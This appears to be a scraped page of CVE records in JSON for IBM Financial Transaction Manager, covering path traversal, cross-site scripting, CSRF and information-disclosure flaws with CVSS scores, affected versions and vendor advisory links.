{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:59.257Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204907-info-disc (191112)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191112" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-12-15T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 4.6, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/PR:N/C:L/A:N/I:N/UI:N/AC:L/AV:N/S:U/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-16T20:35:29", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204907-info-disc (191112)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191112" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-15T00:00:00", "ID": "CVE-2020-4907", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6371260", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6371260 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204907-info-disc (191112)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191112" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4907", "datePublished": "2020-12-16T20:35:29.313089Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-17T02:37:04.211Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-5000
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6463313 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/192952 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.0 ≤ |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:22:07.581Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6463313" }, { "name": "ibm-ftm-cve20205000-xss (192952)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192952" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "lessThan": "3.2.8", "status": "affected", "version": "3.2.0", "versionType": "semver" } ] } ], "datePublic": "2021-06-14T04:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cp\u003e\n\n\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003eIBM Financial Transaction Manager 3.2.0 through 3.2.8 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952.\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\n\n\u003cp\u003e\u003c/p\u003e" } ], "value": "IBM Financial Transaction Manager 3.2.0 through 3.2.8 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 5.2, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-Site Scripting", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-28T19:39:36.347Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6463313" }, { "name": "ibm-ftm-cve20205000-xss (192952)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192952" } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" }, "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-06-14T00:00:00", "ID": "CVE-2020-5000", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" }, { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0.2 and 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "C", "UI": "R" }, "TM": { "E": "H", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6463313", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6463313 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6463313" }, { "name": "ibm-ftm-cve20205000-xss (192952)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192952" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-5000", "datePublished": "2021-06-15T19:11:53.444065Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-17T01:25:38.641Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1847
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/security-bulletin-path-traversal-exposure-saveexport-function-ftm-oac | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/150946 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 2.1 Version: 2.0 Version: 2.1.1.2 Version: 3.0.0.0 Version: 3.0.0.1 Version: 3.0.0.2 Version: 2.1.1.0 Version: 3.0.0.3 Version: 3.0.0.4 Version: 3.0.0.5 Version: 3.0.0.6 Version: 3.0.0.7 Version: 3.0 Version: 3.0.0.8 Version: 2.1.1.1 Version: 2.1.1.3 Version: 2.1.1.4 Version: 2.1.1 Version: 2.0.0.0 Version: 2.0.0.1 Version: 2.0.0.2 Version: 2.0.0.3 Version: 2.0.0.4 Version: 2.0.0.5 Version: 2.1.0 Version: 2.1.0.0 Version: 2.1.0.1 Version: 2.1.0.2 Version: 2.1.0.3 Version: 2.1.0.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T04:14:38.588Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/security-bulletin-path-traversal-exposure-saveexport-function-ftm-oac" }, { "name": "ibm-ftm-cve20181847-info-disc (150946)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150946" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "2.1" }, { "status": "affected", "version": "2.0" }, { "status": "affected", "version": "2.1.1.2" }, { "status": "affected", "version": "3.0.0.0" }, { "status": "affected", "version": "3.0.0.1" }, { "status": "affected", "version": "3.0.0.2" }, { "status": "affected", "version": "2.1.1.0" }, { "status": "affected", "version": "3.0.0.3" }, { "status": "affected", "version": "3.0.0.4" }, { "status": "affected", "version": "3.0.0.5" }, { "status": "affected", "version": "3.0.0.6" }, { "status": "affected", "version": "3.0.0.7" }, { "status": "affected", "version": "3.0" }, { "status": "affected", "version": "3.0.0.8" }, { "status": "affected", "version": "2.1.1.1" }, { "status": "affected", "version": "2.1.1.3" }, { "status": "affected", "version": "2.1.1.4" }, { "status": "affected", "version": "2.1.1" }, { "status": "affected", "version": "2.0.0.0" }, { "status": "affected", "version": "2.0.0.1" }, { "status": "affected", "version": "2.0.0.2" }, { "status": "affected", "version": "2.0.0.3" }, { "status": "affected", "version": "2.0.0.4" }, { "status": "affected", "version": "2.0.0.5" }, { "status": "affected", "version": "2.1.0" }, { "status": "affected", "version": "2.1.0.0" }, { "status": "affected", "version": "2.1.0.1" }, { "status": "affected", "version": "2.1.0.2" }, { "status": "affected", "version": "2.1.0.3" }, { "status": "affected", "version": "2.1.0.4" } ] } ], "datePublic": "2019-07-11T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) v2.0.0.0 through 2.0.0.5, v2.1.0.0 through 2.1.0.4, v2.1.1.0 through 2.1.1.4, and v3.0.0.0 through 3.0.0.8 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 150946." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AC:L/AV:N/I:N/PR:L/S:C/UI:N/A:N/C:L/RC:C/E:U/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-09-18T15:10:11", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/security-bulletin-path-traversal-exposure-saveexport-function-ftm-oac" }, { "name": "ibm-ftm-cve20181847-info-disc (150946)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150946" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-07-11T00:00:00", "ID": "CVE-2018-1847", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "2.1" }, { "version_value": "2.0" }, { "version_value": "2.1.1.2" }, { "version_value": "3.0.0.0" }, { "version_value": "3.0.0.1" }, { "version_value": "3.0.0.2" }, { "version_value": "2.1.1.0" }, { "version_value": "3.0.0.3" }, { "version_value": "3.0.0.4" }, { "version_value": "3.0.0.5" }, { "version_value": "3.0.0.6" }, { "version_value": "3.0.0.7" }, { "version_value": "3.0" }, { "version_value": "3.0.0.8" }, { "version_value": "2.1.1.1" }, { "version_value": "2.1.1.3" }, { "version_value": "2.1.1.4" }, { "version_value": "2.1.1" }, { "version_value": "2.0.0.0" }, { "version_value": "2.0.0.1" }, { "version_value": "2.0.0.2" }, { "version_value": "2.0.0.3" }, { "version_value": "2.0.0.4" }, { "version_value": "2.0.0.5" }, { "version_value": "2.1.0" }, { "version_value": "2.1.0.0" }, { "version_value": "2.1.0.1" }, { "version_value": "2.1.0.2" }, { "version_value": "2.1.0.3" }, { "version_value": "2.1.0.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) v2.0.0.0 through 2.0.0.5, v2.1.0.0 through 2.1.0.4, v2.1.1.0 through 2.1.1.4, and v3.0.0.0 through 3.0.0.8 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 150946." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "N", "PR": "L", "S": "C", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/security-bulletin-path-traversal-exposure-saveexport-function-ftm-oac", "refsource": "CONFIRM", "title": "IBM Security Bulletin 958753 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/security-bulletin-path-traversal-exposure-saveexport-function-ftm-oac" }, { "name": "ibm-ftm-cve20181847-info-disc (150946)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150946" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1847", "datePublished": "2019-09-18T15:10:12.000330Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T18:24:56.134Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-2026
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/106733 | vdb-entry, x_refsource_BID | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/155552 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=ibm10795536 | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=ibm10795544 | x_refsource_CONFIRM |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.1 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T04:14:39.668Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "106733", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/106733" }, { "name": "ibm-ftm-cve20182026-info-disc(155552)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/155552" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10795536" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10795544" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.1" } ] } ], "datePublic": "2019-01-21T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.2.1 for Digital Payments could allow an authenticated user to obtain a directory listing of internal product files. IBM X-Force ID: 155552." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.8, "temporalSeverity": "LOW", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:N/PR:L/S:U/UI:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-01-29T10:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "106733", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/106733" }, { "name": "ibm-ftm-cve20182026-info-disc(155552)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/155552" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10795536" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10795544" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-01-21T00:00:00", "ID": "CVE-2018-2026", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.2.1 for Digital Payments could allow an authenticated user to obtain a directory listing of internal product files. IBM X-Force ID: 155552." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "N", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "106733", "refsource": "BID", "url": "http://www.securityfocus.com/bid/106733" }, { "name": "ibm-ftm-cve20182026-info-disc(155552)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/155552" }, { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10795536", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10795536" }, { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10795544", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10795544" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-2026", "datePublished": "2019-01-23T16:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-17T00:10:32.085Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-5001
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6958504 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/192953 | vdb-entry |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.0 ≤ |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:22:08.606Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6958504" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192953" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "lessThan": "3.2.7", "status": "affected", "version": "3.2.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(204, 217, 226);\"\u003eIBM Financial Transaction Manager 3.2.0 through 3.2.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 192953.\u003c/span\u003e\n\n" } ], "value": "\nIBM Financial Transaction Manager 3.2.0 through 3.2.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 192953.\n\n" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-01T21:10:10.518Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6958504" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192953" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM Financial Transaction Manager path traversal", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-5001", "datePublished": "2023-03-01T21:10:10.518Z", "dateReserved": "2019-12-30T00:00:00.000Z", "dateUpdated": "2024-08-04T08:22:08.606Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-4736
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/1135173 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/172706 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:40:48.964Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194736-csrf (172706)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172706" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0" } ] } ], "datePublic": "2019-12-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 172706." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.8, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/A:N/UI:R/S:U/C:N/I:L/PR:N/AV:N/AC:L/E:U/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Access", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-12-20T16:25:25", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194736-csrf (172706)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172706" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-12-19T00:00:00", "ID": "CVE-2019-4736", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 172706." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "N", "I": "L", "PR": "N", "S": "U", "UI": "R" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Access" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/1135173", "refsource": "CONFIRM", "title": "IBM Security Bulletin 1135173 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194736-csrf (172706)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172706" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2019-4736", "datePublished": "2019-12-20T16:25:25.899292Z", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-09-16T16:42:41.644Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4906
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6371260 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/191110 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
